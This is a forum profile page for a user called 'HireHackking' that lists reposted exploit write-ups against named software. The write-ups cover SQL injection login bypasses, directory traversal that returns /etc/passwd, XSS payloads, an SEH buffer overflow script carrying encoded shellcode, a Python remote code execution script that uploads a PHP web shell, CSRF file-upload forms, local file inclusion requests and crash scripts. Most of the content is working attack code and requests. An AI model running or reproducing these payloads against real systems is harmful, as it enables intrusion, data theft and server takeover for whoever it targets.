Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path # Exploit Author: Bobby Cooke # Date: 2020-07-15 # Vendor Site: https://www.10-strike.com/ # Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe # Tested On: Windows 10 - Pro 1909 (x86) # Version: Version 3.9 # Vulnerability Type: # Local Privilege Escalation to LocalSystem by Unquoted Service Path. # Vulnerability Description: # The 10-Strike Bandwidth Monitor v3.9 services "Svc10StrikeBandMontitor", "Svc10StrikeBMWD", and "Svc10StrikeBMAgent" suffer # from unquoted service path vulnerabilities that allow attackers to achieve Privilege Escalation to SYSTEM, at startup, # by placing a malicious binary in the truncated service path; such as "C:\Program.exe". C:\Users\boku>wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor" Svc10StrikeBandMonitor C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe Auto LocalSystem Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe Auto LocalSystem Svc10StrikeBMAgent C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe Auto LocalSystem
  2. HireHackking

    College-Management-System-Php 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Website: https://github.com/olotieno/College-Management-System-Php # Date: 2020-06-16 # Google Dork: N/A # Vendor: https://github.com/olotieno/ # Software Link: https://github.com/olotieno/College-Management-System-Php.git # Affected Version: N/A # Patched Version: unpatched # Category: Web Application # Tested on: MAC The College Management System Php suffers from sql injection vulnerabilities in the index.php page: $msg=""; if(isset($_POST['btn_log'])){ $uname=$_POST['unametxt']; $pwd=$_POST['pwdtxt']; $sql=mysqli_query($con,"SELECT * FROM users_tbl WHERE username='$uname' AND password='$pwd' SQL injection vulnerability:- in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability payload: ' or 1=1 -- Thank you regards Abu Safian Blay https://inveteckglobal.com<http://inveteckglobal.com>
  3. HireHackking

    OpenCTI 3.3.1 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCTI 3.3.1 - Directory Traversal # Date: 2020-03-05 # Exploit Author: Raif Berkay Dincel # Vendor Homepage: www.opencti.io/ # Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1] # Version: [3.3.1] # CVE-ID: N/A # Tested on: Linux Mint / Windows 10 # Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD] # As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS]) # Technical information is provided below step by step. # [1] - Directory Traversal Vulnerability # Vulnerable Parameter Type: GET # Vulnerable Parameter: TARGET/static/css/[Payload] # Proof of Concepts: https://TARGET/static/css//../../../../../../../../etc/passwd # HTTP Request: GET /static/css//../../../../../../../../etc/passwd HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c Upgrade-Insecure-Requests: 1 # HTTP Response HTTP/1.1 200 OK X-DNS-Prefetch-Control: off X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: text/css; charset=utf-8 ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o" Vary: Accept-Encoding Date: Sun, 03 May 2020 01:25:21 GMT Connection: close Content-Length: 1280 root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin node:x:1000:1000:Linux User,,,:/home/node:/bin/sh # [2] - Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: GET # Vulnerable Parameter: TARGET/graphql?[Payload] # Proof of Concepts: TARGET/graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E # HTTP Request: GET /graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. HireHackking

    Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) # Vendor Homepage: http://www.codeblocks.org/ # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-16 # Vulnerable Software: Code Blocks # Version: 17.12 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: codeblocks.py # 2.- Copy content to clipboard # 3.- Turn off DEP for codeblocks.exe # 4.- Open "codeblocks.exe" # 5.- Go to "File" > "New" > "Project..." # 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next" # 7.- Paste ClipBoard into the "Filename with fullpath:" . # 8.- Click on "Finish". # 9.- Calc.exe runs. ################################################################################################################################################# #Python "codeblocks.py" Code: f= open("codeblocks.txt", "w") junk1="A" * 2006 nseh="\x61\x62" #popad / align #Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe seh="\xe0\x50" ven = "\x62" #align ven +="\x53" #push ebx ven += "\x62" #align ven += "\x58" #pop eax ven += "\x62" #align ven += "\x05\x14\x11" #add eax, 0x11001400 ven += "\x62" #align ven += "\x2d\x13\x11" #sub eax, 0x11001300 ven += "\x62" #align ven += "\x50" #push eax ven += "\x62" #align ven += "\xc3" #ret junk2="\x41" * 108 #required to make sure shellcode = eax #msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX buf = "" buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72" buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50" buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b" buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52" buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31" buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c" buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37" buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a" buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71" buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34" buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79" buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52" buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71" buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30" buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d" buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c" buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b" buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b" buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34" buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32" buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b" buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64" buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30" buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66" buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78" buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d" buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70" buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52" buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43" buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53" buf += "\x35\x6d\x30\x41\x41" junk3 = "\x62" * 5000 #padding to crash payload = junk1 + nseh + seh + ven + junk2 + buf +junk3 f.write(payload) f.close
  5. HireHackking

    Beauty Parlour Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass # Google Dork: N/A # Exploit Author: Prof. Kailas PATIL (krp) # Date: 2020-06-18 # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ # Version: v1.0 # Category: Webapps # Tested on: LAMP for Linux # Description: # Password and username parameters have sql injection vulnerability in Admin login panel. # #------------------------------------------------------ # # Login Link: http://localhost/bpms/admin/index.php # username: ' or '1'='1'# # password: blah123 # #------------------------------------------------------
  6. HireHackking

    FileRun 2019.05.21 - Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting # Date: 2019-07-01 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.filerun.com/ # Software Link: https://filerun.com/download # Version: v2019.05.21 # Tested on: Windows/Linux # CVE: CVE-2019-12905 # CVE-2019-12905 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905 # https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 # PoC To exploit vulnerability, someone could upload an allowed file named “><img src=x onerror=prompt(document.domain)> to impact users who open the page. POST /filerun/?module=fileman&section=do&page=up HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.191.129/filerun/ Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403 Content-Length: 6034 DNT: 1 Connection: close Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowTotalSize" 5100 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsFirstChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsLastChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowFilename" â��><img src=x onerror=prompt(document.domain)>.jpg -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="path" /ROOT/HOME -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="file"; filename="â��><img src=x onerror=prompt(document.domain)>.jpg" Content-Type: image/jpg <%@ I said you should learn! %> -----------------------------142096305821079611661465592403--
  7. HireHackking

    Student Enrollment 1.0 - Unauthenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Enrollment 1.0 - Unauthenticated Remote Code Execution # Date: 2020-06-22 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html # Version: 1.0 # Tested on: Windows 10 / WampServer # Usage : python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE import requests import string import random import sys import getopt options, remainder = getopt.gnu_getopt(sys.argv[1:], 'hu:c:') for opt, arg in options: if opt in ('-h'): print('Usage: python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE') exit() elif opt in ('-u'): url = arg elif opt in ('-c'): cmd = arg res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 10)) session = requests.session() burp0_url = url+"/admin/register.php" burp0_cookies = {} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.100/student_enrollment/admin/register.php", "Content-Type": "multipart/form-data; boundary=---------------------------5220369311929647034402434351", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\n"+res+"@gmail.com\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"c_password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"a.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n$cmd = shell_exec($_GET['cmd']); echo $cmd;\n?>\n\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"register\"\r\n\r\n\r\n-----------------------------5220369311929647034402434351--\r\n" session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) rce = requests.get("http://192.168.1.100/student_enrollment/admin/images/"+res+".php?cmd="+cmd) get_code = rce.text print("Exploit Author--> Selim Enes 'Enesdex' Karaduman") print(get_code)
  8. HireHackking

    Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-06-20 # Exploit Author: BKpatron # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. #CSRF PoC: <html> <body> <form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data"> <input type="file" name="userphoto" required="" id="photo"><br> <input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo"> </form> </body> </html>
  9. HireHackking

    Odoo 12.0 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Odoo 12.0 - Local File Inclusion # Date: 2019-06-14 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.odoo.com/ # Software Link: https://www.odoo.com/tr_TR/page/download # Version: v12.0 # Tested on: Windows/Linux # https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities # https://www.odoo.com/security-report # PoC-1 To exploit vulnerability, someone could use 'http://[HOST]:8069/base_import/static/c:/windows/win.ini' request to get some information from the target. GET /base_import/static/c:/windows/win.ini HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 # PoC-2 To exploit vulnerability, someone could use 'http://[HOST]:8069/ web/static/c:/windows/win.ini' request to get some information from the target. GET /web/static/c:/windows/win.ini HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 # PoC-3 To exploit vulnerability, someone could use 'http://[HOST]:8069/ base/static/c:/windows/win.ini' request to get some information from the target. GET /base/static/c:/windows/win.ini HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
  10. HireHackking

    WebPort 1.19.1 - Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting # Date: 2019-05-30 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://webport.se/ # Software Link: https://webport.se/nedladdningar/ # Version: v1.19.1 # Tested on: Windows/Linux # CVE-2019-12461 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461 # https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS # PoC To exploit vulnerability, someone could use 'http:// [server]:8090/log?type="</script><script>alert('xss');</script><script>' request to impact users who open a maliciously crafted link or third-party web page. GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37 Upgrade-Insecure-Requests: 1
  11. HireHackking

    WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting # Date: 2019-05-30 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://webport.se/ # Software Link: https://webport.se/nedladdningar/ # Version: v1.19.1 # Tested on: Windows/Linux # CVE-2019-12460 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460 # https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS # PoC To exploit vulnerability, someone could use 'http:// [server]:8090/access/setup?type="</script><script>alert('xss');</script><script>' request to impact users who open a maliciously crafted link or third-party web page. GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37 Upgrade-Insecure-Requests: 1
  12. HireHackking

    Frigate 2.02 - Denial Of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Frigate 2.02 - Denial Of Service (PoC) # Vendor Homepage: http://www.frigate3.com/ # Software Link Download: http://www.frigate3.com/download/Frigate2.exe # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-22 # Vulnerable Software: Frigate # Version: 2.02 # Vulnerability Type: Denial of Service (DoS) # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: FrigateCrash.py # 2.- Copy content to clipboard # 3.- Open "Frigate2.exe" # 4.- Go to "Disk" > "Activate Command Line" # 5.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. # 6.- Press Enter from Keyboard. # 7.- Click on OK in the dialog box that appears. # 8.- Crashed. ################################################################################################################################################## #Python "FrigateCrash.py" Code: f= open("FrigateCrash.txt", "w") payload="\x41" * 8000 f.write(payload) f.close()
  13. HireHackking

    Eaton Intelligent Power Manager 1.6 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal # Date: 2018-09-29 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://powerquality.eaton.com/ # Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999 # Version: v1.6 # Tested on: Windows # CVE-2018-12031 # https://nvd.nist.gov/vuln/detail/CVE-2018-12031 # https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion # PoC To exploit vulnerability, someone could use 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' request to get some informations from the target. GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
  14. HireHackking

    Responsive Online Blog 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection # Date: 2020-06-23 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL # Version: v1.0 # Tested on: Linux - Wamp Server >Vulnerable File /category.php >Vulnerable Code $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"; Id parameter enters sql query without any changes >Proof Of Concept sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch OR http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error
  15. HireHackking

    Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student) # Google Dork: N/A # Date: 2020-06-20 # Exploit Author: BKpatron # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: This product is unprotected against CSRF vulnerabilities. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. you can upload a PHP file here with CSRF. # CSRF PoC( add student ,File Upload): <html> <body> <form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student"> <label for="name">Student Name</label> <input name="name" type="text" id="name" value="" required=""><br/> <label for="roll">Student Roll</label> <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/> <label for="address">Student Address</label> <input name="address" type="text" value="" id="address" required=""><br/> <label for="pcontact">Parant Contact NO</label> <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/> <label for="class">Student Class</label> <select name="class" class="form-control" id="class" required=""><br/> <option>Select</option> <option value="1st">1st</option> <option value="2nd">2nd</option> <option value="3rd">3rd</option> <option value="4th">4th</option> <option value="5th">5th</option> </select><br/> <label for="photo">Student Photo</label> <input name="photo" type="file" id="photo" required=""><br/> <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger"> </form> </body> </html> #HTTP Request: http://localhost/student_enrollment/admin/index.php?page=add-student POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1586330740172 Content-Length: 1669 Referer: http://localhost/exploit2.php Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------1586330740172: undefined Content-Disposition: form-data; name="name" bkpatron -----------------------------1586330740172 Content-Disposition: form-data; name="roll" 333000 -----------------------------1586330740172 Content-Disposition: form-data; name="address" 0000 -----------------------------1586330740172 Content-Disposition: form-data; name="pcontact" 01911111111 -----------------------------1586330740172 Content-Disposition: form-data; name="class" 1st -----------------------------1586330740172 Content-Disposition: form-data; name="photo"; filename="up.php" Content-Type: application/octet-stream ... // uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
  16. HireHackking

    Code Blocks 20.03 - Denial Of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
